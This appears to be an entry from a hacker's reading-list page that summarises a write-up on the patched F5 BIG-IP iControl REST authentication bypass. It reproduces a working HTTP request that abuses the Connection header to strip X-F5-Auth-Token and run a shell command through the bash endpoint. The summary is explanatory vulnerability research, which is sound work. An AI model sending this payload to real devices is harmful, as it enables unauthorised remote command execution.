Resources
People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!
F5 iControl REST Endpoint Authentication Bypass Technical Deep Dive
James Horseman - horizon3.aiPosted 3 Years Ago- F5 recently patched a critical vulnerability in their BIG-IP series. The blog post is a technical dive that starts from a payload to identify the vulnerability. This is shown below:
POST /mgmt/tm/util/bash HTTP/1.1 Host: 127.0.0.1 Authorization: Basic YWRtaW46aG9yaXpvbjM= X-F5-Auth-Token: asdf User-Agent: curl/7.82.0 Connection: X-F5-Auth-Token Accept: */* Content-Length: 39 {“command”:”run”,”utilCmdArgs”:”-c id”} - The service is a Java application running on localhost, which is exposed by Apache. The vulnerability exists because of a difference in understanding between the reverse proxy (which the code is in
mod_auth_pam.so) and the service itself. - The module
mod_auth_pam.sowould perform authentication checks in most cases with theAuthorizationheader. However, if theX-F5-Auth-Tokenwas used, it was the job of the downstream service to verify it. If the flow got into the downstream service without theX-F5-Auth-Tokentoken, it was assumed that the auth had already passed. - This seems to be failing open at the downstream service. Is it possible to drop the header
X-F5-Auth-Tokenprior to getting the downstream service by after the initial verification? - By using the
Connectionheader to drop theX-F5-Auth-Token(hop to hop header), this will do the trick! The dropping of headers was done AFTER the verification step for auth mentioned above in the library prior to the downstream service. Wow! - Overall, an amazing vulnerability that led to a lot of pain and suffering for people. Any times things are failing open, there is likely a leak in there they can be exploited. Don't do it kids!
